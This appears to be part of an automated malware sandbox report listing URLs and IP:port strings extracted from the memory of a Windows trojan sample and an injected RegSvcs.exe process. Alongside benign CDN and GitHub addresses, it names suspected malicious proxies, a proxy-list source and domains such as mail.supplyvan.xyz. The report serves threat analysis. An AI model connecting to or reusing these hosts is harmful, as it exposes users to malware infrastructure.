                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.4:31654
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.4:31654://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.7:31653
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.7:31653://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.170.57.249:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.170.57.249:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.175.31.195:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.175.31.195:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.178.72.21:10919
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.178.72.21:10919://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.181.137.80:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.181.137.80:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.181.137.83:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.181.137.83:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.188.47.132:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.188.47.132:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.188.47.150:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.188.47.150:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://99.26.234.177:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://99.26.234.177:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://99.62.41.65:3126
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://99.62.41.65:3126://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0M
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA67B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C759F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6577000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F8D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFD8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E21000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9267000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crls.pki.goog/gts1p5/0jT46UX4DmY.crl0
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://heygirlisheeverythingyouwantedinaman.com:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C90FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://html5shiv.googlecode.com/svn/trunk/html5.js
                      Source: RegSvcs.exe, 00000004.00000002.2764598895.0000000002C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D9427000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D80E6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2757087631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2762933530.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2764598895.0000000002C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: RegSvcs.exe, 00000004.00000002.2764598895.0000000002CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.supplyvan.xyz
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA67B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C759F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6577000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F8D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFD8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E21000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9267000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/s/gts1p5/uFgUyufpvHQ01
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA67B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C759F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6577000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F8D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFD8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E21000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9267000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1p5.der0_
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/SoftwareSourceCode
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2764598895.0000000002C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAFF3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8005000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7905000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB0C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.freecsstemplates.org
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C90FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.froxlor.org/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D9427000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D80E6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2757087631.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/errors
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/stats
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.githubusercontent.com
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/themes/flick/jquery-ui.min.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.github.com/github/collect
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://desktop.github.com
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/articles/about-issue-and-pull-request-templates
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/github/creating-cloning-and-archiving-repositories/creating-a-repository-on-
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/site-policy/github-terms/github-terms-of-service
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/site-policy/privacy-policies/github-privacy-statement
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://education.github.com
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Ubuntu:400
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github-cloud.s3.amazonaws.com
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.blog
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6397000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List.git
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List/blob/master/http.txt
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List/blob/master/http.txt&quot;
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List/blob/master/http.txt?raw=true
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List/raw/master/http.txt
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/fluidicon.png
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/notifications/beta/shelf
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_g
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-cbcee078
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-5e0904652c1c.j
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_react-code-view_components_directory_Direc
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/behaviors-bde2e016b2b8.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/code-ac2c2f3d57f1.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/code-menu-2658b004279a.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark-a167e256da9c.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-d11f2cf8009b.css
